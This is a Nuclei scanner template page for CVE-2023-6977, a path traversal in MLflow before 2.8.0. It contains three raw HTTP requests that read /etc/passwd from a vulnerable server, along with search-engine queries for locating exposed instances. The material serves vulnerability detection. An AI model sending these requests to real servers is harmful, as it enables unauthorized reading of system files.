Skip to content
Nuclei Templates

Mlflow <2.8.0 - Local File Inclusion

ID: CVE-2023-6977

Severity: high

Author: gy741

Tags: cve,cve2023,mlflow,oss,lfi,intrusive,lfprojects

Description

Section titled “Description”

Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

YAML Source

Section titled “YAML Source”
id: CVE-2023-6977


info:
  name: Mlflow <2.8.0 - Local File Inclusion
  author: gy741
  severity: high
  description: |
    Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation could allow an attacker to read sensitive files on the server.
  remediation: |
    Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
  reference:
    - https://huntr.com/bounties/fe53bf71-3687-4711-90df-c26172880aaf
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6977
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-6977
    cwe-id: CWE-29
    epss-score: 0.00494
    epss-percentile: 0.76167
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: lfprojects
    product: mlflow
    shodan-query: http.title:"mlflow"
    fofa-query:
      - title="mlflow"
      - app="mlflow"
    google-query: intitle:"mlflow"
  tags: cve,cve2023,mlflow,oss,lfi,intrusive,lfprojects


http:
  - raw:
      - |
        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=utf-8


        {"name":"{{randstr}}"}


      - |
        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=utf-8


        {"name":"{{randstr}}","source":"//proc/self/root"}


      - |
        GET /model-versions/get-artifact?name={{randstr}}&path=etc%2Fpasswd&version=1 HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"


      - type: word
        part: header_3
        words:
          - "filename=passwd"
          - "application/octet-stream"
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d8969a4d9f40442fbeaba708a02734f6e3756fc4cfb16ff66ccbb2363307a898022016c40beebef7fb9234db79d38e8597f7320a211fc029725d5664a061017bd5e9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-6977.yaml"

View on Github